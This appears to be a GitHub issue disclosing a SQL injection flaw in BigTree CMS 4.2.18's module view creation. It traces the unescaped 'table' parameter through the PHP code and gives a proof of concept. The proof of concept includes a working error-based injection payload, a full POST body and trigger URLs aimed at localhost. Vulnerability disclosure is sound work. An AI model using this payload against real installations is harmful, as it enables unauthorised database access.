FILE:
\BigTree-CMS-4.2.18\core\admin\modules\developer\modules\views\create.php
at first, Create the view $view_id = $admin->createModuleView($module,$title,$description,$table,$type,$options,$fields,$actions,$related_form,$preview_url);
the blemish param is table
then search the view
\BigTree-CMS-4.2.18\core\admin\ajax\auto-modules\views\searchable-page.php
// Grab View Data
if (isset($_GET["view"])) {
$bigtree["view"] = BigTreeAutoModule::getView(sqlescape($_GET["view"]));
}
......
$data = BigTreeAutoModule::getSearchResults($bigtree["view"],$page,$search,$sort,false);
static function getView($id,$decode_ipl = true) {
global $cms;
if (is_array($id)) {
$id = $id["id"];
}
$view = sqlfetch(sqlquery("SELECT * FROM bigtree_module_views WHERE id = '".sqlescape($id)."'"));
......
static function getSearchResults($view,$page = 1,$query = "",$sort = "id DESC",$group = false) {
// Check to see if we've cached this table before.
self::cacheViewData($view);
......
static function cacheViewData($view) {
$q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE `table` = '".$view["table"]."' AND item_id IS NULL");
}
csrf_token_5TK1XAX747RXJ9X7496WHQ3F46C8134H=EINM%2FLjgLccbJjtUPYyVswTRkk7nZa%2Bs6Xb%2BPTLi8Gs%3D&title=111111&preview_url&description=&table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#&related_form=&type=searchable&options=%7B%22filter%22%3A%22%22%2C%22sort%22%3A%22%60asdf%60%60+ASC%22%2C%22per_page%22%3A%2215%22%7D&fields%5Basdf%60%5D%5Bwidth%5D=748&fields%5Basdf%60%5D%5Btitle%5D=Asdf%60&fields%5Basdf%60%5D%5Bparser%5D=&actions%5Bedit%5D=on&actions%5Bdelete%5D=on
As mentioned in the other SQL injection report, Developers already have access to direct PHP calls through column parsers in modules so this doesn't lead to an escalation of existing privileges or additional data leakage.
SQL injection in bigtreecms 4.2.18
FILE:
\BigTree-CMS-4.2.18\core\admin\modules\developer\modules\views\create.php
at first, Create the view
$view_id = $admin->createModuleView($module,$title,$description,$table,$type,$options,$fields,$actions,$related_form,$preview_url);the blemish param is table
then search the view
\BigTree-CMS-4.2.18\core\admin\ajax\auto-modules\views\searchable-page.php
cointinue
\BigTree-CMS-4.2.18\core\inc\bigtree\auto-modules.php
here the var $view["table"] have a sqli vuln
POC:
1、add a module
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/add/
2、add a view for module, set table as table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/add/?module=18
3、request the url leads to sqli:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/ajax/auto-modules/views/searchable-page/?sort=&sort_direction=ASC&view=18&module=&search=&page=1
4、request the url leads to sqli too:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/modules_name_at_one_step/
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/style/module_id/
The text was updated successfully, but these errors were encountered: